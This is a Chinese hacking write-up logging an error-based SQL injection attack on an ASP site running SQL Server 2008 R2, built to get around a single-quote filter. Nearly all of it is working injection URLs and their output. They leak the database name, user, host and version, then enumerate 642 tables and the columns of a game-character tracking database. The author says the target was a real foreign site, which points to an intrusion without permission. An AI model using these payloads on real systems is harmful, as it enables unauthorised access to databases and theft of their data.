对 sql server 2008 一次简单测试，显错模式，不支持单引号条件的突破

    By：鬼画符

    对sql server 2008一次简单测试，显错模式，对不支持单引号条件下的一次突破。

----------------------------------------------------------------------

获取数据库名字

http://www.xxtt.com/xxtt.asp?id=10 and (len(db_name()))=7

http://www.xxtt.com/xxtt.asp?id=(select convert(int,(db_name())))   ddxxzz
Conversion failed when converting the nvarchar value 'ddxxzz' to data type int.

http://www.xxtt.com/xxtt.asp?id=(select convert(int,(user)))   ddxxzz
http://www.xxtt.com/xxtt.asp?id=convert(int,(select host_name()))  SV3141
http://www.xxtt.com/xxtt.asp?id=10 or 1=convert(int,(@@version))
Microsoft SQL Server 2008 R2 (RTM) - 10.50.1600.1 (X64) Apr 2 2010 15:48:46 Copyright (c) Microsoft Corporation Web Edition (64-bit) on Windows NT 6.1 <X64> (Build 7601: Service Pack 1)

http://www.xxtt.com/xxtt.asp?id=10 and (select count(table_name) from information_schema.tables)=642 642张表
http://www.xxtt.com/xxtt.asp?id=(select top 1 table_name from  information_schema.tables)  wow_toons_321
http://www.xxtt.com/xxtt.asp?id=(select top 1 table_name from  information_schema.tables where table_name not in('wow_toons_321'))

http://www.xxtt.com/xxtt.asp?id=(select top 1 table_name from  information_schema.tables where table_name not in(1))  sysrscols

http://www.xxtt.com/xxtt.asp?id=(select top 1 column_name from information_schema.columns)
ID  rsid

http://www.xxtt.com/xxtt.asp?id=10 "&"or 1=convert(int,(@@version))
An object or column name is missing or empty. For SELECT INTO statements, verify each column has a name. For other statements, look for empty alias names. Aliases defined as "" or [] are not allowed. Change the alias to a valid name.


http://www.xxtt.com/xxtt.asp?id=(select * from wow_toons_321)
Only one expression can be specified in the select list when the subquery is not introduced with EXISTS.

子查询返回多个值1。这是不允许的子查询如下时，=，=，<，<=，>，> =，或子查询用作表达式时。

http://www.xxtt.com/xxtt.asp?id=10"
An object or column name is missing or empty. For SELECT INTO statements, verify each column has a name. For other statements, look for empty alias names. Aliases defined as "" or [] are not allowed. Change the alias to a valid name.
缺少或为空的对象或列名。对于SELECT INTO语句，核实每一列都有一个名字。对于其他报表，看空的别名名称。别名定义为“”或[]是不允许的。一个有效的名称更改别名。

http://www.xxtt.com/xxtt.asp?id="10
Unclosed quotation mark after the character string '10'.
未闭合的引号的字符串'10'后。

http://www.xxtt.com/xxtt.asp?id="10"
Invalid column name '10'.
无效的列名称'10'。

http://www.xxtt.com/xxtt.asp?id=10 as a
Incorrect syntax near the keyword 'as'.
关键字'为'附近有语法错误。

http://www.xxtt.com/xxtt.asp?id=(select db_name())
Conversion failed when converting the nvarchar value 'ddxxzz' to data type int.
转换失败时转换nvarchar值'ddxxzz“数据类型为int的。


----------------------------------------------------------------------
http://www.xxtt.com/xxtt.asp?id=convert(int,(select name from master.dbo.sysdatabases where dbid=11))
select * from [ddxxzz].dbo.sysobjects where xtype='u'

http://www.xxtt.com/xxtt.asp?id=convert(int,(select top 1 id from [ddxxzz].dbo.sysobjects where xtype='u'))
----------------------------------------------------------------------------------------------------------------
http://www.xxtt.com/xxtt.asp?id=(select top 1 table_name from  information_schema.tables where table_name not in(select top 641 table_name from  information_schema.tables))
----642----
wow_toons_15 642
wow_characters  641
wow_toons_388
wow_toons_82
wow_toons_284
wow_toons_top
wow_toons_457
wow_toons_149
wow_toons_1577
wow_toons_217
wow_toons_1645
wow_toons_48
wow_toons_1720
wow_toons_422
wow_toons_115
wow_toons_319
wow_toons_493
wow_toons_182
wow_toons_352
wow_toons_1610
wow_toons_250
wow_toons_387
wow_toons_81
wow_toons_283
wow_toons_456
wow_toons_148
wow_toons_1576
wow_toons_216
wow_toons_1644
wow_toons_47
wow_toons_1719   611
wow_toons_421
wow_toons_114
wow_toons_318
wow_toons_492
wow_toons_181
wow_toons_1609

wow_characters  641
wow_alerts   587
wow_toons    538
wow_realms   508
wow_ExcludeProgress  457
wow_guilds   453
wow_guildmoves 425
wow_Achievements 412  26
wow_ads          399      12   Name，
wow_guilds_top 348
wow_toons_top  336
wow_rankhistory 304  19
wow_criteria 288
wow_submitters 254
wow_toons_oldest_EUP 236
wow_toons_oldest_EU  233
wow_toons_oldest_USP 228
wow_toons_oldest_US  222
wow_Messages  216
wow_toons_oldest_TWP 214
wow_toons_oldest_TW  211
wow_guildachievements
wow_achhistory  149  11
wow_deletedtoons 133
wow_NAchievements 122  8
wow_stats     111      20
wow_lootrank  13       5

------------------------------------------------column_name--------------------------------------------------------
select top 1 column_name from information_schema.columns where table_name in(select top 1 table_name from  information_schema.tables where table_name not in(select top 641 table_name from information_schema.tables))
select count(column_name) from information_schema.columns where table_name in(select top 1 table_name from  information_schema.tables where table_name not in(select top 641 table_name from information_schema.tables))
wow_toons_15  表,23个字段
http://www.xxtt.com/xxtt.asp?id=10 and (select count(column_name) from information_schema.columns where table_name in(select top 1 table_name from  information_schema.tables where table_name not in(select top 641 table_name from information_schema.tables)))=23

select top 1 column_name from information_schema.columns where column_name not in(select top 22 column_name from information_schema.columns where table_name in(select top 1 table_name from  information_schema.tables where table_name not in(select top 641 table_name from information_schema.tables)))
http://www.xxtt.com/xxtt.asp?id=(select top 1 column_name from information_schema.columns where column_name not in(select top 22 column_name from information_schema.columns where table_name in(select top 1 table_name from  information_schema.tables where table_name not in(select top 641 table_name from information_schema.tables))))
wow_toons_15  表详细字段
firstHeroickills
firstNormalkills
firstAchpoints
firstHKs
Lastseen
Clevel
BGr
HKs
AchPoints
gs
normalkills
heroickills
av_ilevel
SpecID
Race
Class
Location
Guild
Realm
PvPItems
Dateseen
Achievement
ID
-------------------------------------------------------------------------------------------------------------------
wow_toons_388 表,23个字段
http://www.xxtt.com/xxtt.asp?id=10 and (select count(column_name) from information_schema.columns where table_name in(select top 1 table_name from  information_schema.tables where table_name not in(select top 639 table_name from information_schema.tables)))=23
详细字段
http://www.xxtt.com/xxtt.asp?id=(select top 1 column_name from information_schema.columns where column_name not in(select top 23 column_name from information_schema.columns where table_name in(select top 1 table_name from  information_schema.tables where table_name not in(select top 639 table_name from information_schema.tables))))
firstHeroickills
firstNormalkills
firstAchpoints
firstHKs
Lastseen
Clevel
BGr
HKs
AchPoints
gs
normalkills
heroickills
av_ilevel
SpecID
Race
Class
Location
Guild
Realm
PvPItems
Dateseen
Achievement
ID
-------------------------------------------------------------------------------------------------------------------
对国外某站点一次测试,虽然结果没达到想要的,但学到了方法,突破不支持单引号,想了很久,小人愚昧,请大仙见谅。